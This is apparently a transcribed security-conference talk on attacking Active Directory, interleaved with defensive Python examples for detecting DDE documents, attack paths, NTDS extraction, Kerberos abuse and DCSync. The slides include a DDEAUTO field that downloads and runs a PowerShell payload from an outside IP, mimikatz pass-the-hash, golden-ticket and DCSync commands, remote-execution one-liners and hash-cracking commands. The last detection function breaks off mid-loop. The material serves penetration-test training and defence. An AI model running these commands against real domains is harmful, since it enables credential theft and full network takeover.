PENTESTING ACTIVE DIRECTORY
Carlos García García (ciyinet)
RootedCON 2018
WHOAMI: Carlos García García
- Computer Science Engineer
- Penetration Testing and Red Teaming
- OSCP Certified
- Co-author of the book "Hacking Windows: Ataques a sistemas y redes Microsoft"
WHAT ARE WE GOING TO TALK ABOUT?
- Introduction to Active Directory
- Authentication Protocols
- Active Directory Penetration Testing
  - Reconnaissance
  - Common Attacks & Techniques
  - Lateral and Vertical Movements
- How to Avoid Being Caught
BEAR IN MIND
- AD-related techniques
- I learn Active Directory from the offensive side
- We lower risks, not the other way around
- This is going to be intense
ACTIVE DIRECTORY 101
• AD is Microsoft's answer to directory services
• A directory service is a hierarchical structure that stores objects for quick access to, and management of, all resources
ACTIVE DIRECTORY 101
• Uses LDAP as its access protocol
• Relies on DNS as its locator service, enabling clients to locate domain controllers through DNS queries
• AD supports several naming conventions:
  • User Principal Names (UPN): user@domain
  • LDAP names (Distinguished Names): cn=common name, ou=organizational unit, dc=domain component
    e.g. cn=ciyi, ou=Madrid, dc=Rooted, dc=CON
ACTIVE DIRECTORY 101 (diagram slide)
ACTIVE DIRECTORY 101: Just a Database: NTDS.dit (diagram slide)
ACTIVE DIRECTORY 101: Domain Controllers and Domain Admins (diagram slide)
CREDENTIALS FLOW IN WINDOWS (diagram slide)
NTLM SCHEME
Protocol   Algorithm   Secret to use
LM         DES-ECB     LM hash
NTLMv1     DES-ECB     NT hash
NTLMv2     HMAC-MD5    NT hash
KERBEROS SCHEME
Protocol   Secret to use
Kerberos   RC4 key = NT hash, AES128 key, AES256 key
KERBEROS SCHEME (diagram slide)
1. The client encrypts a timestamp with its hash/key (pre-authentication)
2. The client receives a TGT, protected with the domain krbtgt account's key, that proves they are who they say they are
3. The TGT is then used to request service tickets (TGS) for specific resources/services on the domain
4. The DC sends back a TGS ticket encrypted with the hash of the account associated with that service (its SPN)
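The four steps above, and the "secret to use" table, as a runnable exchange. This Python is an added example, not material from the talk: it simulates a KDC, a client and a service with a toy authenticated cipher (HMAC-SHA256 keystream plus MAC, a stand-in for RC4-HMAC/AES-CTS) and constructed principals, passwords and an SPN. What it shows is where each key is used: the user's key only in pre-authentication, the krbtgt key only around the TGT, the service account's key only around the service ticket. That is exactly why the Kerberoast and golden ticket sections later focus on the service account's password and the krbtgt hash respectively.

```python
import hashlib
import hmac
import json
import os
import time

TGT_LIFETIME = 10 * 3600  # seconds; the AD default the talk quotes later (10 hours)


# --- Toy authenticated encryption standing in for Kerberos etypes (NOT RC4-HMAC/AES-CTS) ---
def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]


def seal(key: bytes, obj: dict) -> bytes:
    """Encrypt-then-MAC a JSON object under `key`; only that key can open or forge it."""
    pt = json.dumps(obj, sort_keys=True).encode()
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key: bytes, blob: bytes) -> dict:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered ticket")
    return json.loads(bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct)))))


def long_term_key(password: str) -> bytes:
    """Stand-in for the 'secret to use' column: derived from the password alone."""
    return hashlib.sha256(password.encode("utf-16le")).digest()


class KDC:
    """Holds every principal's long-term key, as the DC does in NTDS.dit."""

    def __init__(self, keys: dict, spn_owner: dict):
        self.keys, self.spn_owner = keys, spn_owner

    def as_exchange(self, user: str, preauth: bytes):
        # Step 1: the timestamp must open under the user's key and be fresh.
        ts = unseal(self.keys[user], preauth)["timestamp"]
        if abs(time.time() - ts) > 300:
            raise ValueError("stale pre-authentication")
        session = os.urandom(32).hex()
        # Step 2: the TGT is sealed with krbtgt's key; the client can neither read nor alter it.
        tgt = seal(self.keys["krbtgt"], {"user": user, "session": session,
                                         "exp": time.time() + TGT_LIFETIME})
        return seal(self.keys[user], {"session": session}), tgt

    def tgs_exchange(self, tgt: bytes, authenticator: bytes, spn: str):
        # Step 3: the KDC trusts the TGT only because it opens under krbtgt's key.
        body = unseal(self.keys["krbtgt"], tgt)
        session = bytes.fromhex(body["session"])
        if unseal(session, authenticator)["user"] != body["user"] or body["exp"] < time.time():
            raise ValueError("invalid TGT/authenticator")
        svc_session = os.urandom(32).hex()
        # Step 4: the service ticket is sealed with the SPN owner's key, nothing else.
        ticket = seal(self.keys[self.spn_owner[spn]],
                      {"user": body["user"], "session": svc_session, "spn": spn})
        return seal(session, {"session": svc_session}), ticket


# Constructed principals: krbtgt's key is random, a service key comes from its password.
KEYS = {"ciyi": long_term_key("correct horse battery"), "krbtgt": os.urandom(32),
        "svc_sql": long_term_key("Summer2018!")}
SPN = "MSSQLSvc/sql01.rooted.con:1433"


def run_demo(typed_password: str = "correct horse battery") -> str:
    """Full AS + TGS exchange; returns the identity the service ends up trusting."""
    kdc = KDC(KEYS, {SPN: "svc_sql"})
    client_key = long_term_key(typed_password)
    enc_part, tgt = kdc.as_exchange("ciyi", seal(client_key, {"timestamp": time.time()}))  # AS-REQ/REP
    session = bytes.fromhex(unseal(client_key, enc_part)["session"])
    enc_part, ticket = kdc.tgs_exchange(                                                  # TGS-REQ/REP
        tgt, seal(session, {"user": "ciyi", "timestamp": time.time()}), SPN)
    # AP-REQ: the service never contacts the KDC; it opens the ticket with its own key.
    return unseal(KEYS["svc_sql"], ticket)["user"]


def preauth_rejected(typed_password: str) -> bool:
    """True when the KDC refuses the AS-REQ (wrong password => wrong key => MAC failure)."""
    try:
        run_demo(typed_password)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("service trusts:", run_demo())
    print("wrong password rejected:", preauth_rejected("wrong"))
```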
PENTESTING ACTIVE DIRECTORY
Sure, but how about actually pentesting it?
ACTIVE DIRECTORY PENETRATION TESTING
The Goal (diagram slide): the privileged groups
• Domain Admins
• Enterprise Admins
• Built-in Administrators
• Account Operators
• Allowed RODC Password Replication Group
• Backup Operators
• DnsAdmins
• …
The real Goal! (diagram slides; one of them shows WMIC)
ATTACK KILL CHAIN (diagram slides)
Reference: Microsoft Advanced Threat Analytics
PENTESTING ACTIVE DIRECTORY: Infrastructure (diagram slide)
PENTESTING ACTIVE DIRECTORY: Classic Intrusion Scheme (diagram slide)
PHISHING + DDEAUTO = RCE
• Dynamic Data Exchange (DDE): protocol for transferring data between applications
• Valid for MS Excel, MS Word… and MS Outlook
• Recently used as macro-less malware
The DDEAUTO field shown on the slide:
DDEAUTO "C:\Programs\Microsoft\Office365\Outlook\..\..\..\..\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://172.16.201.201:8000/empire-test.ps1');powershell -e $e # " "Beneficios Qurtuba"
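A defender-side check for this delivery vector, added here and not part of the talk: scan every XML part of a .docx (headers, footers and footnotes included) for DDE/DDEAUTO field instructions, including fields whose instruction is split across several w:instrText runs, which is how such fields usually look after editing. The sample documents are built in memory with placeholder commands; nothing here executes a field.

```python
import io
import re
import xml.etree.ElementTree as ET
import zipfile

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
DDE_RE = re.compile(r"^\s*(DDE|DDEAUTO)\b", re.IGNORECASE)


def find_dde_fields(docx_bytes: bytes) -> list:
    """Return (part name, field instruction) for every DDE/DDEAUTO field in a .docx."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            # Headers, footers and footnotes are separate parts; scan them all, not just document.xml.
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(z.read(name))
            # Simple fields keep the whole instruction in one attribute.
            for fld in root.iter(W + "fldSimple"):
                instr = fld.get(W + "instr", "")
                if DDE_RE.match(instr):
                    hits.append((name, instr.strip()))
            # Complex fields spread it over w:instrText runs between fldChar begin/end.
            buf, inside = [], False
            for el in root.iter():
                if el.tag == W + "fldChar":
                    kind = el.get(W + "fldCharType")
                    if kind == "begin":
                        buf, inside = [], True
                    elif kind == "end" and inside:
                        instr = "".join(buf)
                        if DDE_RE.match(instr):
                            hits.append((name, instr.strip()))
                        inside = False
                elif inside and el.tag == W + "instrText":
                    buf.append(el.text or "")
    return hits


def build_docx(body_xml: str) -> bytes:
    """Minimal constructed .docx: just enough package structure for the scanner."""
    doc = ('<?xml version="1.0" encoding="UTF-8"?>'
           '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           "<w:body>" + body_xml + "</w:body></w:document>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed samples with placeholder commands.
BENIGN = "<w:p><w:r><w:t>Beneficios Qurtuba</w:t></w:r></w:p>"
SPLIT_DDE = ('<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
             "<w:r><w:instrText>DDEAUTO c:\\placeholder\\app.exe </w:instrText></w:r>"
             '<w:r><w:instrText>"argument"</w:instrText></w:r>'
             '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
             "<w:r><w:t>Beneficios</w:t></w:r>"
             '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>')
SIMPLE_DDE = '<w:p><w:fldSimple w:instr=" DDE placeholder.exe arg "><w:r><w:t>x</w:t></w:r></w:fldSimple></w:p>'


def scan_samples() -> dict:
    return {"benign": len(find_dde_fields(build_docx(BENIGN))),
            "dde": len(find_dde_fields(build_docx(SPLIT_DDE + SIMPLE_DDE)))}


if __name__ == "__main__":
    for part, instr in find_dde_fields(build_docx(SPLIT_DDE + SIMPLE_DDE)):
        print(part, "->", instr)
```

Fields can be obfuscated (nested QUOTE fields, unusual whitespace) in ways a prefix regex will miss, so treat this as a mail-gateway triage rule rather than a complete detector; the durable mitigation is disabling automatic DDE updates in Office through the registry keys Microsoft published for it.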
NEXT STEPS
• Persistence (userland)
• Reconnaissance
• Privilege escalation
  • PowerSploit PowerUp
  • Bypass UAC
  • …
• Persistence (admin)
• Lateral and vertical movements
• Grab and exfiltrate trophies
PENTESTING ACTIVE DIRECTORY
Reconnaissance
LOCAL RECONNAISSANCE
Collect information about the network, processes and OS to find out what kind of machine we have succeeded in infecting.
Command                          Description
ipconfig /all                    Displays the IP address, subnet mask and default gateway for all adapters, plus DHCP and DNS settings
whoami /all                      Displays all information in the current access token: current user name, security identifiers (SIDs), privileges and the groups the current user belongs to
net localgroup                   Displays the name of the server and the names of the local groups on the computer
net localgroup "administrators"  Displays the local administrators
netstat -an                      Displays active TCP connections, ports on which the computer is listening, Ethernet statistics and the IP routing table
tasklist /V                      Displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer
LOCAL RECONNAISSANCE
Command                          Description
net start                        Lists started Windows services
sc qc <SERVICE>                  Gets the parameters of an individual service
accesschk.exe -ucqv <SERVICE>    Determines the service's access control rules (accesschk.exe is part of the Microsoft Sysinternals suite)
systeminfo > info_output.txt     Displays detailed configuration information about the computer and its operating system: OS configuration, security information, product ID and hardware properties such as RAM, disk space and network cards
schtasks /query /fo LIST /v      Lists the scheduled tasks: whether they are recurring, where the task can be found and its parameters, as well as, crucially, the permissions they run with
dir, type, findstr               Browse and search for information in the local file system
NETWORK RECONNAISSANCE
Collect information about the network, processes and OS to find out what kind of machine we have succeeded in infecting.
Command                                   Description
ping                                      Basic reachability check
echo %USERDOMAIN%                         Domain the host is joined to
echo %logonserver% (or set logonserver)   Name of the Domain Controller the host authenticated against
net group /domain                         Lists the existing groups in the domain
net group "<GROUP NAME>" /domain          Lists the members of a group, e.g. "domain computers", "domain controllers", "domain admins"
net localgroup administrators /domain     Lists the members of the built-in "Administrators" group
NETWORK RECONNAISSANCE
Command                                   Description
net user /domain                          Lists all users in the current domain
net user <ACCOUNT NAME> /domain           Detailed information about a user, given the username
net view                                  Displays a list of domains, computers or resources shared by the specified computer; without parameters it lists the computers in the current domain
net use                                   Access shared resources
net accounts /domain                      Obtains the domain password policy
nltest /domain_trusts                     Maps trust relationships
PENTESTING ACTIVE DIRECTORY
Common Attacks & Techniques
COMMON ATTACKS & TECHNIQUES
• Passwords in SYSVOL & Group Policy Preferences – 10%
• Missing patches: exploit MS14-068 on a DC missing the patch – 5%
• Kerberos TGS service ticket cracking (Kerberoast) – 20%
• SMB shares mining – 75%
• Credential theft shuffle ("Mimikatz dance") – 60%
Reference: https://adsecurity.org/?p=2362
KERBEROAST (diagram slide: the four-step Kerberos exchange from the KERBEROS SCHEME slide, with the attacker in the client role requesting service tickets)
KERBEROAST
• Offline brute force of the service account's password, using the service tickets (TGS) encrypted with it
• No risk of detection
• No account lockouts
• Invoke-Kerberoast from PowerView (dev branch) to collect the hashes
• Focus on user accounts: they have shorter passwords than computer accounts
• JohnTheRipper (magnumripper) to crack them
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/magnumripper/JohnTheRipper
SMB SHARES MINING
• Usually very fruitful, but sometimes boring and time consuming
• Enumerate the shares in the environment and look for data with hardcoded creds (scripts, config files), backups, documentation…
PowerView Find-DomainShare
• Searches for computer shares on the domain. If -CheckShareAccess is passed, only shares the current user has read access to are returned.
smbmap
• Intended to simplify searching for potentially sensitive data across large networks
• Enumerates SMB share drives across an entire domain: lists drives, permissions and contents, with upload/download functionality, file-name auto-download pattern matching, etc.
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/ShawnDEvans/smbmap
CREDENTIAL THEFT SHUFFLE ("Mimikatz dance")
• Escalate privileges on some machine
• Extract creds/hashes from memory
• Derivative administrator
• User hunting: move laterally and repeat the attack until Domain Admin level is reached
Reference: https://github.com/gentilkiwi/mimikatz
DERIVATIVE ADMINISTRATOR (diagram slide)
USER HUNTING
List local admins remotely
• Get-localadmin (script)
• Get-NetLocalGroup (PowerView)
List active sessions remotely
• PsLoggedon (Sysinternals)
• Get-NetLoggedon (PowerView)
• Get-NetSession (PowerView)
• Tasklist
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://docs.microsoft.com/en-us/sysinternals/
https://gitlab.com/ciyinet/ciyinotes/blob/master/Microsoft%20Windows/readme.md
USER HUNTING
• Invoke-UserHunter (PowerView)
• BloodHound
  1. Gets the groups and the members of each group
  2. Lists the domain computers
  3. Obtains the local admins of each computer
  4. Lists the active sessions on each computer
References:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/BloodHoundAD/BloodHound
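What BloodHound does with the four collections above is build a graph and search it. The Python below is an added example, not BloodHound's code: it uses the same three edge types (MemberOf, AdminTo, HasSession) over a constructed inventory of groups, local admins and sessions, finds the shortest path from an ordinary user to Domain Admins with a breadth-first search, and lists the hosts on which Domain Admin credentials are currently exposed, which is the list a defender wants in order to cut the path (remove the admin right, or stop DAs logging on there).

```python
from collections import defaultdict, deque

# Constructed inventory: what steps 1-4 collect (group members, computers, local admins, sessions).
GROUP_MEMBERS = {"Domain Admins": ["admin.ciyi"], "Helpdesk": ["hd.ana"], "IT": ["hd.ana", "bob"]}
LOCAL_ADMINS = {"WS01": ["Helpdesk"], "WS02": ["IT"], "SRV01": ["admin.ciyi"],
                "SRV02": ["hd.ana"], "DC01": ["Domain Admins"]}
SESSIONS = {"WS01": ["bob"], "WS02": ["hd.ana"], "SRV02": ["admin.ciyi"]}


def build_graph(group_members, local_admins, sessions):
    """Directed edges in BloodHound's vocabulary: MemberOf, AdminTo, HasSession."""
    edges = defaultdict(list)
    for group, members in group_members.items():
        for member in members:
            edges[member].append((group, "MemberOf"))      # member inherits the group's rights
    for host, admins in local_admins.items():
        for admin in admins:
            edges[admin].append((host, "AdminTo"))          # admin can run code / read LSASS there
    for host, users in sessions.items():
        for user in users:
            edges[host].append((user, "HasSession"))        # whose creds are in memory on host
    return edges


def shortest_path(edges, start, goal):
    """Breadth-first search; returns [(src, edge, dst), ...] or None if goal is unreachable."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            path = []
            while prev[node] is not None:
                src, label = prev[node]
                path.append((src, label, node))
                node = src
            return path[::-1]
        for nxt, label in edges.get(node, ()):
            if nxt not in prev:
                prev[nxt] = (node, label)
                queue.append(nxt)
    return None


def exposed_hosts(group_members, sessions, group):
    """Hosts where a member of `group` has a live session: where its creds can be stolen from."""
    members = set(group_members.get(group, ()))
    return sorted(h for h, users in sessions.items() if members & set(users))


def demo_path():
    return shortest_path(build_graph(GROUP_MEMBERS, LOCAL_ADMINS, SESSIONS), "bob", "Domain Admins")


if __name__ == "__main__":
    for src, edge, dst in demo_path():
        print(f"{src} -[{edge}]-> {dst}")
    print("DA credentials exposed on:", exposed_hosts(GROUP_MEMBERS, SESSIONS, "Domain Admins"))
```

Session data is the volatile part of this graph: it is what changes from day to day, and it is the edge a tiered-administration model (no Domain Admin logons outside the DC tier) removes.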
CREDS DUMP + PRIVS ESCALATION (diagram slide)
NTLM RELAY (diagram slide)
PASS-THE-HASH (diagram slides)
Protocol   Algorithm   Secret to use
LM         DES-ECB     LM hash
NTLMv1     DES-ECB     NT hash
NTLMv2     HMAC-MD5    NT hash
OVERPASS-THE-HASH (PASS-THE-KEY) (diagram slide)
Protocol   Secret to use
Kerberos   RC4 key = NT hash, AES128 key, AES256 key
Reference: http://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
(OVER)PASS-THE-HASH
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /run:PROGRAM"
PASS-THE-TICKET
• Inject Kerberos tickets
• Tickets must be in Kerberos credential format (KRB_CRED): http://tools.ietf.org/html/rfc4120#section-5.8
• The Kerberos module does not require any privilege; it uses the official Microsoft Kerberos API
mimikatz.exe "kerberos::ptt FILENAME"
GOLDEN TICKET (diagram slide)
The TGT (username, group membership, …) is encrypted with the KRBTGT hash; the attacker in the diagram holds krbtgt's hash.
GOLDEN TICKET
The KRBTGT hash can be used to generate arbitrary TGTs:
• Made by the attacker, not by the KDC
• Anything can be pushed inside
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /user:USERNAME /id:ID /groups:500,501,513,512,520,518,519 /ptt"
DCSYNC
• "Impersonates" a Domain Controller and requests account password data from the targeted Domain Controller
• Replicates the user credentials via GetNCChanges (Directory Replication Service (DRS) Remote Protocol)
• Special rights are required to run DCSync
mimikatz.exe "lsadump::dcsync /dc:DC /domain:DOMAIN /user:USERNAME" exit
mimikatz.exe "lsadump::dcsync /all /csv" exit
DCSHADOW (diagram slide)
Register new (rogue) domain controllers to inject malicious AD objects and so create backdoors or any other kind of illegitimate access or right
Reference: https://blog.alsid.eu/dcshadow-explained-4510f52fc19d
PENTESTING ACTIVE DIRECTORY
dir is boring, show me how to RCE
REMOTE CODE EXECUTION: AT, Schtasks, SC
at \\TARGET_HOST HH:MM EXECUTABLE
schtasks /create /tn TASK_NAME /tr EXECUTABLE /sc once /st 00:00 /S TARGET_HOST /RU System
schtasks /run /tn TASK_NAME /S TARGET_HOST
sc \\TARGET_HOST create SERVICE_NAME binpath= "EXECUTABLE"
sc \\TARGET_HOST start SERVICE_NAME
REMOTE CODE EXECUTION: WMIC, WinRM, PsExec
wmic /node:TARGET_HOST process call create "EXECUTABLE"
Invoke-Command -ComputerName TARGET_HOST -ScriptBlock { COMMAND(S) }
PsExec.exe \\TARGET_HOST -u USER PROCESS
PENTESTING ACTIVE DIRECTORY
Let's grab the NTDS.dit DB
NTDS.DIT (diagram slide)
NTDS.DIT
How to get the hashes out of it:
1. Decrypt the Password Encryption Key (PEK); the PEK is encrypted with the bootkey (which comes from the SYSTEM hive)
2. First decryption round of the hashes with the PEK, using RC4
3. Second decryption round with DES
GRAB NTDS.DIT AND SYSTEM
• Volume Shadow Copy
• Ntdsutil
• Invoke-NinjaCopy
Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\SYSTEM"
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
vssadmin create shadow /for=C:
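Each of the three extraction methods above leaves a process-creation record on the domain controller (Security event 4688 with command-line auditing, or Sysmon event 1), which is the cheapest place to catch them. The Python below is an added example, not from the talk: constructed rules matched against constructed process-creation lines, with one allowance for the backup account that legitimately creates shadow copies.

```python
import re

# Command-line patterns for the extraction methods on the slide (constructed rules, not a vendor's).
RULES = [
    ("vss_shadow",    re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\b.*\bshadow\b", re.I)),
    ("ntdsutil_ifm",  re.compile(r"\bntdsutil(\.exe)?\b.*(\bifm\b|\bac\s+i\s+ntds\b)", re.I)),
    ("ntds_dit_path", re.compile(r"\\ntds\\ntds\.dit\b", re.I)),
    ("ninjacopy",     re.compile(r"\bInvoke-NinjaCopy\b", re.I)),
]

# Constructed process-creation records: time, host, user, image, command line.
PROCESS_LOG = r"""
2018-03-01T23:10:02 DC01 ROOTED\backupsvc C:\Windows\System32\vssadmin.exe vssadmin create shadow /for=C:
2018-03-01T23:10:40 DC01 ROOTED\hd.ana C:\Windows\System32\ntdsutil.exe ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
2018-03-01T23:12:11 DC01 ROOTED\hd.ana C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c "Invoke-NinjaCopy -Path C:\Windows\NTDS\ntds.dit -LocalDestination C:\ntds.dit"
2018-03-01T23:15:00 DC01 ROOTED\DC01$ C:\Windows\System32\svchost.exe svchost.exe -k netsvcs
"""


def scan_process_log(log_text, expected_backup_accounts=frozenset()):
    """Return (time, user, [rule names]) for every command line that matches an extraction pattern."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(maxsplit=4)
        if len(parts) < 5:
            continue
        ts, host, user, image, cmdline = parts
        matched = [name for name, rx in RULES if rx.search(cmdline)]
        if not matched:
            continue
        account = user.split("\\", 1)[-1]
        # A shadow copy from the backup account is routine; anything else on a DC deserves a look.
        if matched == ["vss_shadow"] and account in expected_backup_accounts:
            continue
        hits.append((ts, account, matched))
    return hits


if __name__ == "__main__":
    for ts, who, rules in scan_process_log(PROCESS_LOG, {"backupsvc"}):
        print(ts, who, ", ".join(rules))
```

Invoke-NinjaCopy reads the raw volume rather than opening the file, so file-access auditing on ntds.dit does not see it; the command line (or the script-block log, if PowerShell logging is on) is the artefact to watch for that one.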
CRACKING NT HASHES
• John the Ripper
• Hashcat & the rockyou wordlist
john FILE_HASHES --format=NT
hashcat -a 0 -m 1000 --username FILE_HASHES /usr/share/wordlists/rockyou.txt --potfile-path OUTPUT_NT.pot
PENTESTING ACTIVE DIRECTORY
But how about the blue team? Microsoft ATA
MICROSOFT ATA (diagram slide)
PASS-THE-HASH
• Detection is based on local Security events
• Not captured by ATA by default
• Forces NTLM to be used
• Overpass-the-hash: the encryption downgrade is detected
mimikatz.exe "privilege::debug" "sekurlsa::pth /domain:FQDN /user:USERNAME /ntlm:NT_HASH /aes128:AES128_key /aes256:AES256_key /run:PROGRAM" exit
GOLDEN TICKET
• Same as overpass-the-hash
• Detection is based on the ticket lifetime
• The default ticket lifetime in AD is 10 hours
mimikatz.exe "kerberos::golden /domain:FQDN /sid:DOMAIN_SID /krbtgt:NT_HASH /aes128:AES128_key /aes256:AES256_key /startoffset:0 /endin:600 /renewmax:10080 /user:USERNAME /ptt"
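The two ATA detections named on the overpass-the-hash and golden ticket slides (an encryption downgrade to RC4 for an account that supports AES, and a TGT whose lifetime exceeds the 10-hour domain policy), plus the pattern behind the Kerberoast slide (one account pulling RC4 service tickets for many SPNs in a short window), can be prototyped over Kerberos observations. The Python below is an added example, not the talk's material and not Microsoft ATA's logic; the observations, the policy value and the inventory of AES-capable accounts are all constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC, AES128_CTS, AES256_CTS = 0x17, 0x11, 0x12   # Kerberos etype numbers
MAX_TGT_LIFETIME = timedelta(hours=10)                 # AD default quoted on the slide
T0 = datetime(2018, 3, 1, 9, 0, 0)


def obs(secs, kind, user, etype, spn=None, life=MAX_TGT_LIFETIME):
    """One constructed observation of an AS or TGS exchange (what ATA or events 4768/4769 show)."""
    t = T0 + timedelta(seconds=secs)
    return {"time": t, "kind": kind, "user": user, "etype": etype, "spn": spn,
            "tgt_start": t, "tgt_end": t + life}


# Accounts whose msDS-SupportedEncryptionTypes allow AES (constructed inventory).
AES_CAPABLE = {"ciyi", "admin.ciyi", "administrator"}

EVENTS = [
    obs(0, "AS", "ciyi", AES256_CTS),                                   # normal logon
    obs(5, "TGS", "ciyi", AES256_CTS, "cifs/fs01"),                     # normal share access
    obs(60, "AS", "admin.ciyi", RC4_HMAC),                              # AES-capable account on RC4
    obs(120, "TGS", "administrator", AES256_CTS, "ldap/dc01",
        life=timedelta(days=3650)),                                     # presents a 10-year TGT
] + [obs(300 + i, "TGS", "ciyi", RC4_HMAC, spn) for i, spn in enumerate(
    ["MSSQLSvc/sql01:1433", "MSSQLSvc/sql02:1433", "http/intranet",
     "http/wiki", "exchangeMDB/mail01", "ftp/files01"])]                # six SPNs in six seconds


def encryption_downgrade(events, aes_capable):
    """Overpass-the-hash indicator: an AS exchange negotiated RC4 for an account that supports AES."""
    return [e for e in events
            if e["kind"] == "AS" and e["etype"] == RC4_HMAC and e["user"] in aes_capable]


def excessive_lifetime(events, max_lifetime=MAX_TGT_LIFETIME):
    """Golden ticket indicator: a presented TGT whose validity exceeds the domain policy."""
    return [e for e in events
            if e["kind"] == "TGS" and e["tgt_end"] - e["tgt_start"] > max_lifetime]


def kerberoast_bursts(events, window=timedelta(minutes=5), min_spns=5):
    """Kerberoast indicator: one account pulling RC4 service tickets for many SPNs in a short window."""
    by_user = defaultdict(list)
    for e in events:
        if e["kind"] == "TGS" and e["etype"] == RC4_HMAC and e["spn"]:
            by_user[e["user"]].append(e)
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort(key=lambda e: e["time"])
        for i, first in enumerate(reqs):
            spns = {r["spn"] for r in reqs[i:] if r["time"] - first["time"] <= window}
            if len(spns) >= min_spns:
                flagged[user] = max(flagged.get(user, 0), len(spns))
    return flagged


if __name__ == "__main__":
    print("downgrade:", [e["user"] for e in encryption_downgrade(EVENTS, AES_CAPABLE)])
    print("lifetime :", [e["user"] for e in excessive_lifetime(EVENTS)])
    print("roasting :", kerberoast_bursts(EVENTS))
```

The mimikatz options on the slides exist to fall below exactly these two thresholds (AES keys instead of an NT hash, a 10-hour lifetime instead of the default), so neither rule should stand alone: a forged TGT still shows up as a TGS exchange with no matching AS exchange for that account and client, and a service account that has been Kerberoasted is cheap to protect by giving it a long random password or making it a group managed service account.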
DCSYNC
DRS traffic (DSGetNCChanges) from a non-DC to a DC can be detected (diagram slide: Microsoft ATA vs. attacker)
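ATA sees DCSync on the wire; without it, the same signal is available on the DC in Security event 4662, because GetNCChanges requires the replication extended rights (the "special rights" the DCSync slide mentions) and each use of them is audited against the domain object. The Python below is an added example, not from the talk: it reads constructed, simplified 4662 lines (the real event is XML with the same fields), keeps only those exercising a replication right, and drops subjects that are domain controllers or an allowlisted sync service such as the Azure AD Connect account.

```python
import re

# Extended rights DRS replication (GetNCChanges) needs, keyed by their control-access GUIDs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
LINE_RE = re.compile(r"(?P<ts>\S+) EventID=(?P<eid>\d+) Subject=(?P<subject>\S+) "
                     r"Properties=(?P<props>.*?) Object=(?P<obj>.*)$")
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}")

# Constructed, simplified 4662 lines; the last GUID is a placeholder for an unrelated property.
LOG_4662 = r"""
2018-03-01T10:01:02 EventID=4662 Subject=ROOTED\DC02$ Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} Object=DC=rooted,DC=con
2018-03-01T10:04:10 EventID=4662 Subject=ROOTED\MSOL_placeholder Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} Object=DC=rooted,DC=con
2018-03-01T10:07:45 EventID=4662 Subject=ROOTED\hd.ana Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} Object=DC=rooted,DC=con
2018-03-01T10:08:00 EventID=4662 Subject=ROOTED\hd.ana Properties={00000000-0000-0000-0000-00000000c0de} Object=CN=ciyi,OU=Madrid,DC=rooted,DC=con
"""


def dcsync_suspects(log_text, dc_accounts, allowlist=frozenset()):
    """4662 events that exercise replication rights from a subject that is not a DC (or allowlisted)."""
    suspects = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["eid"] != "4662":
            continue
        rights = sorted({REPLICATION_RIGHTS[g] for g in GUID_RE.findall(m["props"].lower())
                         if g in REPLICATION_RIGHTS})
        if not rights:
            continue  # some other property access, not replication
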